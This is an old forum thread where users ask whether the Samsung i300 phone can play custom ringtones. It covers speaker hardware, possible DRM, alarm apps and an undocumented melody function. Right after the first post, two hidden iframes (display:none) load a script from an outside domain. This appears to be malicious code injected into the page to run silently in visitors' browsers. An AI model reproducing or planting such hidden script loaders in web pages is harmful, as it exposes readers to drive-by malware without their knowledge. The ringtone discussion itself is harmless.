+ Reply to Thread
Page 1 of 2 1 2 LastLast

Question Personalized Ringers?

Is anyone familiar with any programs that let you create or download personalized ringers (similar to how Nokia does)?

Thanks in advance.

Craig<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

At the moment, no.

Although I have yet to get my hands on an i300-specific SDK or see any real low-level technical details of the phone, here are my observations so far:

NOTE: I throw around the terms "Dragonball" and "phone" a lot. By "Dragonball", I mean the circuitry that is directly connected to and/or controlled by the Dragonball chipset (basically, the Motorola chips that comprise the Palm platform). By "phone", I mean the Qualcomm-licensed chips that comprise the phone functions and the parts directly connected to and/or controlled by them. Ultimately, every button and piece of i/o hardware (speakers, displays, etc) is connected to one or the other. The two work together, but are electronically separate. The best analogy is an old external modem connected to a PC: the modem initiates a connection upon receiving ATDT 9995555555 from the computer (like the Dragonball hardware telling the phone hardware to dial a number), but once the connection is established, the modem can care less whether the computer to which it's connected is making any meaningful use of the data, or even still connected to it.

That said...

* Dragonball (PalmOS) sound is physically separate from phone sound. Dragonball sound is generated by a large piezo speaker. phone sound is generated by the phone's earpiece.

* Phone sound can be triggered by the Dragonball, but as far as I know, the Dragonball has no direct connection to the phone's speaker.

* Whether the phone-generated ringtones can be replaced or customized is unknown at this time. If they CAN be customized, it would most likely have to be by means of the Dragonball hardware telling the phone hardware to use different ringtone data instead. It's likely that the phone ringtone capabilities are more or less the same as comparable late-model Samsung CDMA phones. Which is to say, support for monotonic ringtones is almost guaranteed, and 2, 3, 4, or 16-note polyphonic is possible, but unlikely. The hardware is absolutely capable of digital audio, but whether there's any provision to use it in a ringtone context depends entirely upon the phone chipset.

* Dragonball-generated ringtones probably wouldn't sound as good as phone-generated ringtones, because they'd have to rely upon the Dragonball's relatively primitive sound generation capabilities and piezo speaker.

Personally, I believe the i300 is entirely capable of custom ringtones... definitely monotonic (1-note), probably 4-note polyphonic, possibly digital audio -- using the native phone hardware itself, in addition to any capabilities inherent in the Dragonball itself. The i300's Dragonball chipset and PalmOS will primarily make it easer to juggle and manage multiple custom ringtones, but mainstream i300 users will find the i300's custom ringtone capabilities to be not unlike those of comparable Samsung CDMA phones. The main unique potential of the i300 lies with its graphic capabilities -- displaying full-color images of incoming callers, for instance, or even full-blown graphic eye candy like early 90s Amiga megademos.

Wow!! Thanks for that -- I must admit that most of it sailed over my head, but the bottom line is the bottom line.

PS I am a Syracuse fan, you guys slaughtered us!! Good luck in the Rose Bowl!

Administrator

Arrow

im sure we will see extra ringtones fort his phone soon..:o

I can't believe that the I300 relies on a peizo chip for the "Palm" sound on this thing. That is amzing. How stupid can they be. for $500.00 I would expect better.

My latest Palm OS handheld has been the TRGpro (now called Handera). There are two reasons why I liked the TRG OEM of the palm; compact flash compatible expansion and the use of a REAL SPEAKER for sound.

It is awsome....you can actually play wave files off a compact flash card on the TRGpro. Try that with you regular Palm Pilot! Another GREAT use of a real speaker is the auto-dailing from the phone book. Yes, just select the contact and hold your TRGpro up to a phone and it will belt out the DTMF tones needed to dial the number.

That is such a useful feature that I can't image why Palm or Visor don't add a real speaker to their products. I particularly liked the ability to keep calling card numbers and voice-mail numbers in my TRGpro and being able to have them auto-dialed when in places that I concerned about people watching me dial them (ie. airports).

It is a shame that Samsung took that route of having the Dragonball HW attached to a Peize chip and not the speaker.

Just my thoughts...
    -Brainjuice

Blame the sad realities of marketecture and never-ending quest to shave the last $.03 off the manufacturing costs of a device intended to sell for $500 by eliminating features that are cheap and nice, but at the end of the day won't make the ultimate difference between someone buying it and not buying it.

*sigh*

I DO think Samsung at least went the extra .8 mile and put a capacitor on the piezo so it can at least TRY to reproduce the entire frequency spectrum. I kind of assumed that the Dragonball hw would use the handset speaker too, just because it's big and it's there. I can only assume that a .1 watt audio amp (to power the speaker) cost a few cents more than a piezo speaker, so they went with it instead... Sigh.

Unhappy

Actually, there *is* one other possibility I just thought of... They might have intentionally crippled the Dragonball-generated sound by going with piezo for the sake of custom ringtone Digital Rights Management.

Samsung might have built some form of hardware-enforced DRM into the phone end to control the distribution and usage of custom ringtones. They have zero control over the Dragonball-controlled piezo speaker, but they have absolute firewall-like control over the phone-connected speaker (the Dragonball can only *request* that the phone hardware do something. The phone hardware itself can always refuse.) Someone could still install and use "unauthorized" ringtones via PalmOS hacks, but they'd never sound as good as the phone-generated ones since they'd have to be played over the piezo speaker.

The more I think about it, the more likely the second scenario sounds...

Personalized Alarm Ringer

I downloaded Big Clock from palmgear.com
    and was pleased with the option to use
    custom ringers for the alarm. While you
    still aren't given the option for vibrate,
    this is at least a start.

Administrator

Arrow

yes big clock is great! i used it on the 6035 but have not yet had the time to install it back on the i300...

Gadget Lover

Yet another benefit to downloading your own ringtones...

you can download a silient ringtone, assign it as a distinctive ring to peopl you don't like and now have to worry about them calling you anymore!

downloading ringer tones?

Is it possible to download ringer tones?
    Rick

Administrator

Arrow

not for the i300... they have not yet released an sdk for this phone so 3rd parties can make such things.. and we may not see a sdk for this phone..

Thumbs up

Thanks miamicanes for the dissertation. This helps explain he process in simple terms. I kind of agree with your second set of statements about it probably being intentionally disabled.

Thanks again.

So are custom ringtones now a possibility?

I've been out of the loop for a while, but if there still isn't an app that will let us make custom ringers for the phone, why not?

It seems to me that if developers like PDA Apps can make something that intercepts a call, look up a pic based on number- it wouldn't be impossible to make a similar hook that would play whatever sound we wanted out of an alarms DB- for which there are already utilities to help us convert MIDIs over.

But like I said, I haven't been around for a while, and maybe this has already been done... if so, could someone tell me where?

Thanks!

Thumbs down no...not yet

Sorry...no such luck yet....not that I'm aware of anyway.
    I did a search on "custom ring" but didn't find anything either.

i guess theres no way that we can clone the palm os and phone apps from the palm to the computer and hack into it that way... maybe then we can find out wher all the coding on the ringers are and stuff...

maybe the callerpicID app can be edited to do custom ringtones...

hmmmm...

art

ring tones

Just a question? How does everyone else feel about this? Will there ever be personal ringtones for the I-300? I am begining to wonder.

Administrator

Arrow

it will if:

samsung releases the sdk. OR

someone (like JAKE) figures something out.

i dont think you will anytime soon...

Guru
    TapiOemCfgSaveMelody(UInt32, UInt 16, UInt 32)

It exists, but only samsung knows what the paramters are. As far as I can tell, the second parameter isn't used, and the third could possible be a pointer. I dunno.

Jake
    All About Jake

Peronalized Ring Tones

Is there any kind of program or hack that you can personalize your ring for different people in your address book. I miss that feature on this phone. So I did not have to look at the phone to see who it is.